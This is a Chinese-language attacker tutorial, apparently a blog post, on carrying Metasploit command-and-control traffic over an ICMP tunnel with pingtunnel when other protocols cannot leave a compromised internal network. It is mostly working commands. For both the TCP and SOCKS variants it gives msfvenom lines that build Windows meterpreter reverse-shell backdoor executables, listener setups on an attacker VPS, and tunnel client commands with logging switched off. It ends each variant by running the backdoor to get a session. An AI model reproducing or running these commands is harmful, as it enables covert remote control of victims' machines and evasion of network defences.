后台私信找我获取工具
目录
ICMP隧道作用
ICMP隧道转发TCP上线MSF
开启服务端
生成后门木马
msf开启监听
开启客户端icmp隧道
执行后门木马,本地上线
ICMP隧道转发SOCKS上线MSF
开启服务端
生成后门木马
msf开启监听
开启客户端icmp隧道
执行后门木马,本地上线
ICMP隧道作用
通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,TCP和UDP等传输层协议不能出网,DNS、HTTP等应用层协议也不能出网,只有ICMP协议可以出网。
ICMP隧道转发TCP上线MSF
开启服务端
./pingtunnel -type server
生成后门木马
注意:该木马监听的是本地
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > 9999.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe -o 9999.exe
msf开启监听
handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 9999 #监控全段的ip
或
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.20.128 -P 9999 #192.168.20.128自己的vps的ip
开启客户端icmp隧道
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.20.128 -t 192.168.20.128:9999 -tcp 1 -noprint 1 -nolog 1
执行后门木马,本地上线
ICMP隧道转发SOCKS上线MSF
开启服务端
生成后门木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=8888 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > 8888.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=8888 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe -o 8888.exe
msf开启监听
handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 8888 #监控全段的ip
或
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.20.128 -P 8888 #192.168.20.128自己的vps的ip
开启客户端icmp隧道
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.20.128 -sock5 1 -noprint 1 -nolog 1
执行后门木马,本地上线